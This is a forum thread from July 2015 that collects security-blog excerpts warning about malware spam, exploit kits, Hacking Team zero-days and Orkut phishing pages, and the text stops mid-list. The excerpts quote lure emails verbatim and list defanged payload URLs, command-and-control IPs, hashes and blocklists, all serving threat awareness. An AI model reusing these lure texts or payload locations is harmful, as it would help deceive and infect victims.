July 2, 2015 - "... Mobile advertising is a headache because of its intrusiveness, the amount of bandwidth used, and other unexpected nefarious behaviors. I get it, there’s money to be made–the good guys are trying to sell us something, the bad guys are trying to steal something, and the grey guys are doing a little of both. Grey hats do their work in between the good and the malicious sides of computing and often push the limits of maliciousness when it comes to making a quick buck. Some advertisers have been pushing this grey line by using shady tactics in order to get app installs for some time now. These pay-per-install ad campaigns use the same scarevertising* messaging we see from malware authors like; “You are infected” or “System Alert.” Unlike -fake- alerts that lead to malware, these alerts often -redirect- to legitimate apps residing in Google’s Play Store, like battery saving and security type apps... Most of these ad campaigns use the same wording, images, and fake scans used by malware authors. Because of this, we wanted to spread the word to ignore these ads and hopefully take away some of their impact. Shutting them down and tracking their creators have been difficult. The ads don’t stick around long and Ad Networks have a difficult time preventing because of their small footprint compared to all the ‘good’ ad traffic–they get lost in the chaos.
Don’t fall for the bait. If you come across any of these -fake- messages you can back out of the page or close the tab to dismiss. If they persist it might be necessary to clear out browser history and cookies..."
* https://en.wikipedia.org/wiki/Scareware
:fear::fear: :mad:
AplusWebMaster
2015-07-06, 15:24
FYI...
Fake 'Statement' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/07/malware-spam-statement-as-at-30062015.html
6 July 2015 - "This -fake- financial spam does not come from Hobs Reprographics plc but instead is a simple forgery with a malicious attachment...
From: Manchester Accounts [manchester.accounts@ hobsrepro .com]
Date: 6 July 2015 at 07:10
Subject: Statement as at 30/06/2015
Please find attached statement from HOBS REPROGRAPHICS PLC as at
30/06/2015.
Please note that our payment terms are 30 days.
So far I have only seen one sample, with an attachment named ELLE013006.doc [VT 4/54*] which contains this malicious macro... which downloads a malicious executable from:
ozelduzensurucukursu .com/253/632.exe
... There are usually several versions of the document... The executable is saved as %TEMP%\blogdynamoocom.exe (see what they did there?) and has a VirusTotal detection rate of 1/50**. Automated analysis tools... indicates that the malware phones home to:
62.210.214.106 (OVH, France)
93.89.224.97 (Isimtescil, Cyprus)
87.236.215.151 (OneGbits, Lithuania)
The payload to this is almost definitely the Dridex banking trojan.
Recommended blocklist:
62.210.214.106
93.89.224.97
87.236.215.151 "
* https://www.virustotal.com/en/file/430f35ac1fc92a1935766677eb3cd8e983de606744ce1b638b9cd826434f6cd2/analysis/1436170412/
** https://www.virustotal.com/en/file/095a1f54fe71e6daadec7f928d6877ab4c81c1a680f1f30ee7b9ebf7f26b4af4/analysis/1436169984/
ozelduzensurucukursu .com: 93.89.224.97: https://www.virustotal.com/en/ip-address/93.89.224.97/information/
- http://myonlinesecurity.co.uk/statement-as-at-30062015-manchester-accounts-hobs-reprographics-plc-word-doc-or-excel-xls-spreadsheet-malware/
6 July 2015: ELLE013006.DOC - Current Virus total detections: 4/54*
... There are multiple different versions all of which will download a Dridex banking malware**"
* https://www.virustotal.com/en-gb/file/e0cdad58198db19c11f713ead3ee6cf17cbf9ce6b45255e955ce30b494c6562e/analysis/1436175110/
** https://www.virustotal.com/en-gb/file/666c728d093b39e796508d652a90fe75c9e636d307ab23ed921f542d1a4a983a/analysis/1436173972/
___
Fake 'reference' SPAM - PDF malware
- http://myonlinesecurity.co.uk/with-reference-to-telephone-conversation-tax-authority-senior-consultant-tax-officer-fake-pdf-malware/
6 July 2015 - "'With reference to telephone conversation' coming from random names and email addresses with a zip attachment is another one from the current bot runs... Some subjects seen in this series of emails which have been coming in almost every day for the last week or so include:
With reference to telephone conversation
Further to telephone communication
With reference to Skype discussion
Further to Skype communication
In In the course of telephone conversation
In In the course of telephone consultation
The email looks like:
With reference to yesterday telephone conversation could You send us the kits of books for affixed 2013 original of which is enclosed below.
Please be notified that mail information must contain following tracking No. 159724 for our convenience.
Please also send us a fragment of passport.
If You have any issues regarding provision of mentioned details as soon as possible please contact our legal department colleagues.
Pamela Nelson
Tax authority
-Or-
Further to earlier telephone discussion please dispatch us the packages of financial statements form-sheets years 2015 transcript of which has been enclosed below.
Please be notified that mail details must contain following tracking Numbers 740524 for our ease.
Be so kind to additionally send us an extract of ID.
In case You have any issues with regard to provision of mentioned information at the earliest convenience kindly call our legal office colleagues.
Anna Nelson
Tax authority
-Or-
Further to Tuesday telephone communication please forward to our address the kits of returns for affixed 2013 fragment of which has been attached above.
Please note that mail information ought to include following tracking Numbers 160428 for our convenience.
Be so kind to additionally forward us an transcript of identification.
If You have any problems regarding sending of mentioned information as soon as possible please call our legal office colleagues.
Diane Nelson
Senior Consultant
-Or-
With reference to our Skype discussion please forward us the kits of financial reports form-sheets affixed 2014 fragment of which has been attached to this e-mail.
Please be notified that dispatch information ought to include following tracking No. 887803 for our ease.
Be so kind to additionally send us a copy of identification.
Provided that Your colleagues have several issues regarding dispatch of requested information as early as can please call our contract office staff.
Jane Adams
Tax Officer
And hundreds of other similar worded emails with different numbers, people and positions.
06 July 2015: pattern_of_the_returns.zip: Extracts to: scan-copy_of_the_books.exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d6cf9504b2c72ce8cfe8906b453193da0d5c8858dc7f08e96c36e64580ef972f/analysis/1436180365/
___
BizCN gate actor changes from Fiesta to Nuclear exploit kit
- https://isc.sans.edu/diary.html?storyid=19875
Last Updated: 2015-07-06 - "An 'actor' using gates registered through BizCN recently switched from Fiesta to Nuclear exploit kit (EK)... domains used for the gate have all been registered through the Chinese registrar BizCN. We collected traffic and malware samples related to this actor from Friday 2015-07-03 through Sunday 2015-07-05. This traffic has the following characteristics:
• Compromised servers are usually (but not limited to) forum-style websites.
• Gate domains have all been registered through the Chinese registrar BizCN using privacy protection.
• The domains for Nuclear EK change every few hours and were registered through freenom .com.
Nuclear EK for this actor is on 107.191.63.163, which is an IP registered to Vultr, a hosting provider specializing in SSD cloud servers... The payload occasionally changes and includes malware identified as Yakes [1], Boaxxe [2], and Kovter. NOTE: For now, Kovter is relatively easy to spot, since it's the only malware I've noticed that updates the infected host's Flash player [3].
Chain of events: During a full infection chain, the traffic follows a specific chain of events. The compromised website has malicious javascript injected into the page that points to a URL hosted on a BizCN-registered gate domain. The gate domain redirects traffic to Nuclear EK on 107.191.63.163. If a Windows host running the web browser is vulnerable, Nuclear EK will infect it. Simply put, the chain of events is:
• Compromised website
• BizCN-registered gate domain
• Nuclear EK ..."
(More detail at the isc URL above.)
1] https://www.virustotal.com/en/file/b215e4cf122e3b829ce199c3e914263a6d635f968b4dc7b932482d7901691326/analysis/
2] https://www.virustotal.com/en/file/a0156a1641b42836e64d03d1a0d34cd93d3b041589b0422f8519cb68a4efb995/analysis/
3] http://malware.dontneedcoffee.com/2015/07/kovter-adfraud-is-updating-flash-for-you.html
107.191.63.163: https://www.virustotal.com/en/ip-address/107.191.63.163/information/
> http://malware-traffic-analysis.net/2015/07/05/index2.html
___
RIG exploit kit: Ransomware delivered through Google Drive...
- https://heimdalsecurity.com/blog/security-alert-ransonmware-google-drive-cryptowall-campaign/
July 2nd, 2015 - "... Heimdal Security has recently collected and analyzed a new drive-by campaign abusing vulnerabilities in various popular third-party products. In this campaign, the payload is delivered through the popular Google Drive platform. In the next stage, the payload downloads and runs CryptoWall from a long list of compromised webpages... On these compromised web pages, several malicious scripts force the user to a narrow selection of dedicated domains used in the campaign (more than 80 active domains). These domains makes use of a commercial exploit kit known as RIG, which will try to abuse vulnerabilities in JavaJRE, Adobe Reader, IE and Flash Player. If the victim’s system is not fully updated with the latest version of the software mentioned above, the RIG exploit kit will drop a file that contacts a series of predefined Google drive URLs..."
___
Hacking Team hacked, attackers claim 400GB in dumped data
- http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html
Jul 5, 2015 - "... Specializing in surveillance technology, 'Hacking Team' is now learning how it feels to have their internal matters exposed to the world, and privacy advocates are enjoying a bit of schadenfreude at their expense. Hacking Team is an Italian company that sells intrusion and surveillance tools to governments and law enforcement agencies... Reporters Without Borders has listed the company on its Enemies of the Internet index* due largely to Hacking Teams' business practices and their primary surveillance tool Da Vinci... It isn't known who hacked Hacking Team; however, the attackers have published a Torrent file with 400GB of internal documents, source code, and email communications to the public at large. In addition, the attackers have taken to Twitter, defacing the Hacking Team account with a new logo, biography, and published messages with images of the compromised data..."
* https://surveillance.rsf.org/en/hacking-team/
- http://www.theinquirer.net/inquirer/news/2416391/hacking-team-hacked-as-attackers-expose-400gb-of-corporate-data
Jul 06 2015
:fear::fear: :mad:
AplusWebMaster
2015-07-07, 20:06
FYI...
'Changed Identification Numbers' Spam
- http://threattrack.tumblr.com/post/123461472968/changed-identification-numbers-spam
July 7, 2015 - "Subjects Seen:
Changed identification numbers
Typical e-mail details:
Trust You are well.
Kindly see enclosed modified personal numbers regarding Your bank card.
Kindly confirm the safe recepiency of this letter and of enclosed codes.
Consider this message as strictly personal and never copy it to other entities.
Helen Jackson
Senior Consultant
Screenshot: https://36.media.tumblr.com/eb4e4902b22641b4ca2d0db6eb7e37c9/tumblr_inline_nr4fle4nSj1r6pupn_500.png
Malicious File Name and MD5:
transcript_of_perosnal_forms.exe (0166afeac63b594aa608dab85deddc07)
___
'Hilton Hotel Receipt' Spam
- http://threattrack.tumblr.com/post/123465692883/hilton-hotel-receipt-spam
July 7, 2015 - "Subjects Seen
A for guest WARDE SAID
Typical e-mail details:
Thank you for choosing our hotel and we very much hope that you enjoyed your stay with us.
Enclosed is a copy of your receipt(FOLIODETE_2317766.pdf). Should you require any further assistance please do not hesitate to contact us directly.
We look forward to welcoming you back in the near future.
This is an automatically generated message. Please do not reply to this email address.
Screenshot: https://40.media.tumblr.com/a0bffde5101dcd97699d93fec75acc82/tumblr_inline_nr4iy3iDOW1r6pupn_500.png
Malicious File Name and MD5:
FOLIODETE_0447019.exe (da3fd8a0905df536969e38468d5ca5c8)
___
Zombie 'Orkut' Phish...
- https://blog.malwarebytes.org/fraud-scam/2015/07/attack-of-the-zombie-orkut-phishing-pages/
July 7, 2015 - "... Orkut -was- a Google run social network, invite-only and very popular in places like Brazil, India and the US. Unfortunately, its users were frequent targets of scams, and I myself researched the first -Worm- on the Orkut network way back in 2006. Eventually, other Google services became more popular and the shutters came down for good in 2014:
> https://blog.malwarebytes.org/wp-content/uploads/2015/07/orkut1.jpg
This is done by logging into your Google Account, navigating to the relevant Archive section and being offered a mixture of original format files and HTML:
> https://blog.malwarebytes.org/wp-content/uploads/2015/07/orkut2.jpg
In other words, your still-dead Orkut account has a value attached, in the form of your entirely still-alive Google login. As a result, you’ll still occasionally come across the odd -fake- Orkut frontpage asking for credentials:
> https://blog.malwarebytes.org/wp-content/uploads/2015/07/orkut3.jpg
The above is located at:
lokoleonadinho(dot)xpg(dot)uol(dot)com(dot)br
The page reads as follows:
Who do you know?
Connect to your friends and family using scraps and instant messaging
Meet new people through friends of friends and communities
Share your videos, pictures and passions all in one place
Sign in to orkut with your
Google Account
There’s another one using the same layout and text at:
davitosta(dot)xpg(dot)uol(dot)com(dot)br
These Zombie Login pages are effective whether the scammer intended any sort of “Reclaim your data” riff or not – it doesn’t matter if the page is a regular Orkut login (the ones above are straight copies of the old Orkut frontpage), or geared towards reclaiming Takeout data. It doesn’t matter if the -fakes- were created last week, last month or last year. For as long as old users of Orkut associate it with a Google login, it will always be something that can be leveraged as a potential way in to a Google account whether Orkut is actually active or not. Should the unwary end up on an Orkut -phish- by chance, they may well assume the phony site is somehow the first step to grabbing their old information. With a few taps of the keyboard, their Google login will have been swiped (another good reason to use a password manager, incidentally, because they won’t go auto-filling your data on a fake website – assuming they have autofill and you’re making use of it, of course). A single sign on for multiple services is one way to lessen the impact on users where all of the products are managed by a single company, but this does mean that when one of those services fades into oblivion it can still end up being a gateway to phishing scams. Whether you have fond memories of Orkut, scrapbooks and the occasional worm or your first response is “Orkut on the what now”, be mindful of where you’re entering your Google login – there’s a time and a place for handing over your email and password, and the above two websites are most definitely -not- it."
lokoleonadinho(dot)xpg(dot)uol(dot)com(dot)br:
200.147.36.16: https://www.virustotal.com/en/ip-address/200.147.36.16/information/
200.147.100.28: https://www.virustotal.com/en/ip-address/200.147.100.28/information/
davitosta(dot)xpg(dot)uol(dot)com(dot)br:
200.147.36.16: https://www.virustotal.com/en/ip-address/200.147.36.16/information/
200.147.100.28: https://www.virustotal.com/en/ip-address/200.147.100.28/information/
:fear::fear: :mad:
AplusWebMaster
2015-07-08, 23:52
FYI...
Fake 'bank account' SPAM - malicious payload
- http://blog.dynamoo.com/2015/07/malware-spam-strange-bank-account.html
8 July 2015 - "This -fake- financial spam comes with a malicious payload. It appears to be randomly generated in part, here are some examples:
Date: 8 July 2015 at 18:02
Subject: Strange bank account operation
Kindly be informed that bank did noticed suspect attempt of money withdrawal relating to Your debit card.
Please find enclosed bank e-mail sent by financial department on Monday.
As well attached are security details for Your review.
Michael Morgan
Senior Manager
__
Date: 1 January 1970 at 00:00
Subject: Suspicious bank account operation
Kindly be acknowledged that bank had found unauthorised attempt of amounts withdrawal from Your credit card.
Please find enclosed bank warning provided by bank manager earlier.
Also enclosed are security details for Your affirmation.
Robin Owen
Chief accountant
__
Date: 8 July 2015 at 17:59
Subject: Illegal bank account transfer
Kindly be informed that bank security department has found illegal attempt of money withdrawal from Your Mastercard account.
Please check the enclosed bank publication provided by banking department today.
As well attached are security details for Your approval.
Clive Adams
Tax Consultant
__
Date: 8 July 2015 at 16:55
Subject: Strange bank account transfer
Kindly note that bank did noticed suspect attempt of amounts withdrawal related to Your Mastercard.
Please examine the enclosed bank statement sent by manager on Monday.
Furthermore attached are personal details for Your confirmation.
Martin Morgan
Tax authority
__
Date: 8 July 2015 at 17:51
Subject: Unauthorised bank account activity
Kindly be acknowledged that bank security department had detected suspect attempt of money withdrawal related to Your debit card.
Please check the enclosed bank statement forwarded by banking department today.
In addition attached are security details for Your control.
Robin Willis
Senior Manager
Attached is a Word document [VT 6/55*] with various filenames:
extract_of_bank_document.doc
fragment_of_bank_fax.doc
original_of_bank_report.doc
scan-copy_of_bank_document.doc
transcript_of_bank_statement.doc
All the samples I have seen have an identical document with different names, containing this malicious macro which then goes off and downloads various other components according to the Hybrid Analysis report, using the following URLs:
midwestlabradoodle .com/wp-content/plugins/really-simple-captcha/6727156315273.txt
artyouneed .com/wp-includes/theme-compat/6727156315273.txt
artyouneed .com/wp-includes/theme-compat/kaka.txt
These appear to download as a set of malicious scripts... which then download a further component from:
bluemagicwarranty .com/wp-includes/theme-compat/getrichtoday.exe
This binary has a detection rate of 3/55**. The Malwr report shows that it drops two other files, named as Zlatowef.exe [VT 3/55***] and redtytme4.exe [VT 9/55****] and it also downloads components from:
38.65.142.12 :12551/ON12/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
38.65.142.12 :12551/ON12/HOME/41/5/4/ELHBEDIBEHGBEHK
That IP is allocated to Cogent Communications in Mexico. The download is -Upatre- which means that the payload is almost definitely the Dyre banking trojan, even though the delivery mechanism of a Word document is unusual for Dyre."
Recommended blocklist:
38.65.142.12: https://www.virustotal.com/en/ip-address/38.65.142.12/information/
midwestlabradoodle .com: 72.167.131.160: https://www.virustotal.com/en/ip-address/72.167.131.160/information/
artyouneed .com: 50.63.50.1: https://www.virustotal.com/en/ip-address/50.63.50.1/information/
bluemagicwarranty .com: 173.201.216.40: https://www.virustotal.com/en/ip-address/173.201.216.40/information/
* https://www.virustotal.com/en/file/1776208ea6e0df6d30dfb3086af9841154a6e17e12c9287a7a29b5f16cdb4f24/analysis/1436383031/
** https://www.virustotal.com/en/file/e98507f12a0aa201d61f94a43a36d60c5d4e2babc6b01e5b398c9ac937c9f369/analysis/1436379366/
*** https://www.virustotal.com/en/file/e98507f12a0aa201d61f94a43a36d60c5d4e2babc6b01e5b398c9ac937c9f369/analysis/1436379366/
**** https://www.virustotal.com/en/file/1577a63154059c727022667889e8761930930c0870f3304f640e28f2f8eb3395/analysis/1436382709/
:fear::fear: :mad:
AplusWebMaster
2015-07-09, 14:53
FYI...
Fake 'Your order' SPAM - doc/xls spreadsheet malware
- http://myonlinesecurity.co.uk/your-order-no-3269637-has-been-despatched-123print-word-doc-or-excel-xls-spreadsheet-malware/
9 July 2015 - "'Your order No. 3269637 has been despatched' pretending to come from info@ 123print <info@ 123print .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear customer
Your order 3269637 has been despatched.
Please see attachment for details.
9 July 2015 : 4077774.doc - Current Virus total detections: 4/56*
... which downloads Dridex banking malware (VirusTotal**) from one of these locations
http ://illustramusic .com/43/82.exe
http ://prodasynth .com/43/82.exe
http ://jjsmith .it/43/82.exe
http ://robindesdroits .com/43/82.exe
http ://cabinet-marc-dugue .com/43/82.exe
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/0ddcf6bb44d3e3fc8b2bed152826bded28c10366dc8ef38cfee9313fb4267b5b/analysis/1436435418/
** https://www.virustotal.com/en-gb/file/f09c383ab73e21ea1c3c71518b758772c61c9f7cfe257d394dc03d38ec4a7a01/analysis/1436434288/
... Behavioural information
TCP connections
62.210.214.106: https://www.virustotal.com/en-gb/ip-address/62.210.214.106/information/
23.14.92.35: https://www.virustotal.com/en-gb/ip-address/23.14.92.35/information/
illustramusic .com: 213.186.33.19: https://www.virustotal.com/en-gb/ip-address/213.186.33.19/information/
prodasynth .com: 213.186.33.19:
jjsmith .it: 81.88.48.113: https://www.virustotal.com/en-gb/ip-address/81.88.48.113/information/
robindesdroits .com: 213.186.33.87: https://www.virustotal.com/en-gb/ip-address/213.186.33.87/information/
cabinet-marc-dugue .com: 213.186.33.19:
- http://blog.dynamoo.com/2015/07/malware-spam-your-order-no-3269637-has.html
9 July 2015
> https://www.virustotal.com/en/file/f09c383ab73e21ea1c3c71518b758772c61c9f7cfe257d394dc03d38ec4a7a01/analysis/1436444607/
"... Recommended blocklist:
62.210.214.106 "
___
Unsettled Traffic Fines Spam
- http://threattrack.tumblr.com/post/123643671948/unsettled-traffic-fines-spam
July 9, 2015 - "Subjects Seen
Unsettled traffic fines report
Typical e-mail details:
Kindly see enclosed traffic fines dispatched by State Road Traffic Safety Authority.
Please arrange settlement of penalties in a short time becuase aditional penalties can be imposed as a result of delayed settlement.
In addition check requisites of the document.
Robin Willis
Senior Manager
Screenshot: https://36.media.tumblr.com/5b4d651c8e279cae1b4f08cd2d061fb8/tumblr_inline_nr87vgeFl01r6pupn_500.png
Malicious File Name and MD5:
extract_of_issued_order.scr (cda3dd2862026cf5e1037f35b5660c2f)
Tagged: Upatre, traffic ticket
___
Fake 'AMEX Safe Key' SPAM – PDF malware
- http://myonlinesecurity.co.uk/american-express-safe-key-fake-pdf-malware/
9 July 2015 - "'American Express – Safe Key' pretending to come from American Express Customer Service <AmericanExpress@ welcome .aexp.com> with a link to download a zip attachment is another one from the current bot runs... The email looks like:
Amex Logo
Safe Key
Create your safe key now
Safe Key Logo
Please create your Personal Security Key. Personal Safe Key (PSK) is one of several authentication measures we utilize to ensure we are conducting business with you, and only you, when you contact us for assistance.American Express uses 128-bit Secure Sockets Layer (SSL) technology. This means that when you are on our secured website the data transferred between American Express and you is encrypted and cannot be viewed by any other party. The security of your personal information is of the utmost importance to American Express, please access https ://americanexpress .com to create your PSK (Personal Safe Key).
Note: You will be redirected to a secure encrypted website.
The contained message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Sincerely,
American Express Customer Service ...
9 July 2015: Personal Safe Key instruction.zip: Extracts to: Personal Safe Key instruction.scr
Current Virus total detections: 9/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/ffdcbae089a91278e03937d6683f16eb978cc85aefc0a6fead75bea4084e9d31/analysis/1436458305/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en-gb/ip-address/104.238.141.75/information/
38.65.142.12: https://www.virustotal.com/en-gb/ip-address/38.65.142.12/information/
24.148.217.188: https://www.virustotal.com/en-gb/ip-address/24.148.217.188/information/
2.22.48.170: https://www.virustotal.com/en-gb/ip-address/2.22.48.170/information/
:fear::fear: :mad:
AplusWebMaster
2015-07-10, 14:57
FYI...
Fake 'Invoice reminder' SPAM - PDF malware
- http://myonlinesecurity.co.uk/invoice-reminder-morgan-motor-co-uk-fake-pdf-malware/
10 July 2015 - "'Invoice reminder' pretending to come from random names @ morgan-motor .co.uk with a zip attachment is another one from the current bot runs... The email looks like:
Please note that so far we had not received the outstanding amounts in accordance with the invoice enclosed below.
Unfortunately, we cannot wait another week for amounts to be settled. Kindly ask You to arrange the payment in the nearest future (2 days).
In case the funds are not received in two days we reserve the right to use legal approaches in order to resolve this issue.
We hope You will duly react to this notification and save good business relationships with us.
10 July 2015: invoice-ITK709415.zip: Extracts to: invoice-ITK709415.scr
Current Virus total detections: 1/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2d6e3a5dec0e97ea0a29c9846ebe495584adde8eb750c0d14fd6b49dd6ecf3a1/analysis/1436525114/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en-gb/ip-address/104.238.136.31/information/
38.65.142.12: https://www.virustotal.com/en-gb/ip-address/38.65.142.12/information/
173.248.31.6: https://www.virustotal.com/en-gb/ip-address/173.248.31.6/information/
88.221.14.130: https://www.virustotal.com/en-gb/ip-address/88.221.14.130/information/
- http://blog.dynamoo.com/2015/07/malware-spam-invoice-reminder-morgan.html
10 July 2015
"... Recommended blocklist:
38.65.142.12 "
___
Fake 'HBSC' SPAM - malware attached
- http://myonlinesecurity.co.uk/attn-hsbc-encrypted-3rd-party-payment-malware/
10 July 2015 - "'ATTN: HSBC ENCRYPTED 3RD PARTY PAYMENT' pretending to come from Payment Administrator <info@ hsbc .com.hk> with a zip attachment is another one from the current bot runs.. The email looks like:
Dear Sir/Madam,
The attached payment advice is issued at the request of our customer. This payment is encrypted for security reasons.
The advice is for your reference only. Confirm receipt of this email. In the case you have problems downloading the attachment do not hesitate to revert back to us.
See attached
Yours faithfully,
Global Payments and Cash Management
HSBC ...
10 July 2015: Attachment.rar Extracts to: Dedebot_crypted10806.scr
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2225da6af21393aaaf887ea784bfb4b460ff93a98fc56d65e88300b209d987ea/analysis/1436528754/
___
Fake 'discounts' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/monthly-discounts-team-proprofs-word-doc-or-excel-xls-spreadsheet-malware/
10 July 2015 - "'Monthly discounts pretending to come from support@ proprofs .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Good Morning!
We would appreciate if you took a look at and gained insight into our discounts.
Here we attach the file with information on discounts.
Discounts are time limited.
Best regards, team proprofs.
10 July 2015: e-gift.doc - Current Virus total detections: 25/56*
... Which tries to download http ://gets-adobe .com/fid/ZmlsZToxMTA4NzQzLy8/nkernel.exe However I get nothing from the site from my UK IP number but a colleague in USA did manage to get the payload (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/333b0469ffe4abc0d4af02ef5057e869b8bc99ef1d1cf0ea4d03252e6f190423/analysis/1436543817/
** https://www.virustotal.com/en/file/44e6596510ae28b86ec7fbabf63db5f7b7b6865d77d229c36e7f101816ea9a9d/analysis/1436549421/
... Behavioural information
TCP connections
5.255.255.5: https://www.virustotal.com/en/ip-address/5.255.255.5/information/
204.45.251.183: https://www.virustotal.com/en/ip-address/204.45.251.183/information/
5.255.255.55: https://www.virustotal.com/en/ip-address/5.255.255.55/information/
gets-adobe .com: 109.234.38.103: https://www.virustotal.com/en/ip-address/109.234.38.103/information/
___
PC Shipments declined 9.5% in Q2 2015
- https://www.gartner.com/newsroom/id/3090817
July 9, 2015 - "Worldwide PC shipments totaled 68.4 million units in the second quarter of 2015, a 9.5 percent decline from the second quarter of 2014, according to preliminary results by Gartner, Inc. This was the steepest PC shipment decline since the third quarter of 2013. PC shipments are projected to decline 4.4 percent in 2015. There were many contributors to the decline of PC shipments in the second quarter of 2015, and Gartner analysts highlighted three of the major reasons for the drop in shipments. Analysts emphasized that these inhibitors are temporary events, and they are not changing the PC market's structure. Therefore, while the PC industry is going through a decline, the market is expected to go back to slow and steady growth in 2016..."
> http://www.businesswire.com/news/home/20150709006274/en/PC-Market-Continues-Decline-Windows-10-Release#.VZ-imZNVhBf
July 09, 2015
:fear::fear: :mad:
AplusWebMaster
2015-07-11, 22:14
FYI...
Another Hacking Team Flash 0day Uncovered...
- https://blog.malwarebytes.org/exploits-2/2015/07/new-hacking-team-flash-player-0day-uncovered/
Update: 07/11 9 AM PT As reported by Kafeine*, Angler EK is now using this zero-day...
* http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html
... On a late Friday night, yet another zero-day targeting once again the Flash Player has been uncovered from this very same Hacking Team archive. Adobe released a security bulletin shortly after:
> https://helpx.adobe.com/security/products/flash-player/apsa15-04.html
July 10, 2015 - 'Summary: A critical vulnerability (CVE-2015-5122) has been identified in Adobe Flash Player 18.0.0.204 and earlier versions... Adobe is aware of reports** that an exploit targeting this vulnerability has been published publicly... Adobe expects to make updates available during the week of July 12, 2015... Adobe categorizes this as a critical vulnerability...'"
** https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html
> http://blog.trendmicro.com/trendlabs-security-intelligence/new-zero-day-vulnerability-cve-2015-5123-in-adobe-flash-emerges-from-hacking-team-leak/
July 11, 2015 - "... -two- Adobe Flash player zero-days disclosed in a row from the leaked data of Hacking Team, we discovered -another- Adobe Flash Player zero-day (assigned with CVE number, CVE-2015-5123)... we recommend users -disable- Adobe Flash Player for the meantime until the patch from Adobe becomes available..."
>> https://helpx.adobe.com/security/products/flash-player/apsa15-04.html
Updated: July 12, 2015 - "Critical vulnerabilities (CVE-2015-5122, CVE-2015-5123) have been identified... Adobe expects to make updates available during the week of July 12, 2015..."
Uninstall or Disable Plugins ...
> http://www.howtogeek.com/209156/uninstall-or-disable-your-browser-plug-ins-to-make-your-browser-more-secure/
:fear: :mad: :fear:
AplusWebMaster
2015-07-13, 19:30
FYI...
Fake 'Criminal prosecution' SPAM – PDF malware
- http://myonlinesecurity.co.uk/criminal-offence-prosecution-fake-pdf-malware/
13 July 2016 - "The latest email being sent by the criminal gangs trying to infect you with an Upatre downloader tries to convince you that you are being investigated by the police for a Criminal offence prosecution. Don’t open the attachment - it will infect you. The email looks like:
It has been detected that via Your e-mail account are being mailed materials including discriminatory propaganda.
Please note that mentioned actions are to be qualified as criminal offence forbidden by legislation.
Police will conduct according investigation as a result of which You to five years.
If You had not mailed mentioned materials as sson as possible execute enclosed declaration and forward the scan-copy
13 July 2015: statement_to_be_filed.zip : Extracts to: statement_to_be_executed.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/68ca0e495332654e4a019a9bf537103b9cb07a640c40ebbfb6ff98c817652669/analysis/1436803275/
:fear::fear: :mad:
AplusWebMaster
2015-07-14, 23:52
FYI...
IE 0-day added to mix...
- http://blog.trendmicro.com/trendlabs-security-intelligence/gifts-from-hacking-team-continue-ie-zero-day-added-to-mix/
July 14, 2015 - "... -another- vulnerability that could take over user systems has been found. Our latest discovery is in Internet Explorer, and has been acknowledged by Microsoft and patched as part of the regular Patch Tuesday cycle as MS15-065*. It has been designated as CVE-2015-2425. While we did find proof-of-concept (POC) code, there are still no known attacks exploiting this vulnerability..."
* https://technet.microsoft.com/library/security/MS15-065
July 14, 2015
> https://support.microsoft.com/en-us/kb/3065822
Last Review: 07/14/2015 - Rev: 1.0
Applies to:
Internet Explorer 11
Internet Explorer 10
Windows Internet Explorer 9
Windows Internet Explorer 8
Windows Internet Explorer 7
Microsoft Internet Explorer 6.0
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2425
Last revised: 07/14/2015
:fear::fear:
AplusWebMaster
2015-07-16, 17:05
FYI...
Fake 'Perfect job' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/perfect-achievement-perfect-job-great-work-word-doc-or-excel-xls-spreadsheet-malware/
16 July 2015 - "An email with subjects like 'Perfect achievement ! / Perfect job ! / Great work !' coming from random email addresses and names with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Congratulations ! You will take a 30% rake-off for the latest selling. Please overlook the attached documents to know the entire sum you’ve received.
Every day you demonstrate that you are the superior strength of our crew in the market. I am elate and appreciative to get such a capable and experienced subordinate. Keep up the good achievements.
With the best regards.
Michelle Silva General manager
-Or-
Congratulations ! You will receive a 30% commission for the previous disposition. Please check out the enclosed documents to find out the whole amount you’ve won.
Everyday you prove that you are the major force of our crew in the trading. I am sublime and appreciative to get such a capable and skilled workman. Continue the great job.
All the best.
Kathryn Brooks Company management
-Or-
Congratulations ! You will win a 40% commission for the latest realization. Please overlook the next documentation to get to know the whole amount you’ve won.
Everyday you demonstrate that you are the major strength of our team in the world of trade. I am sublime and appreciative to have such a capable and proficient subordinate. Proceed the good achievements.
All the best.
Sharon Silva General manager
-Or-
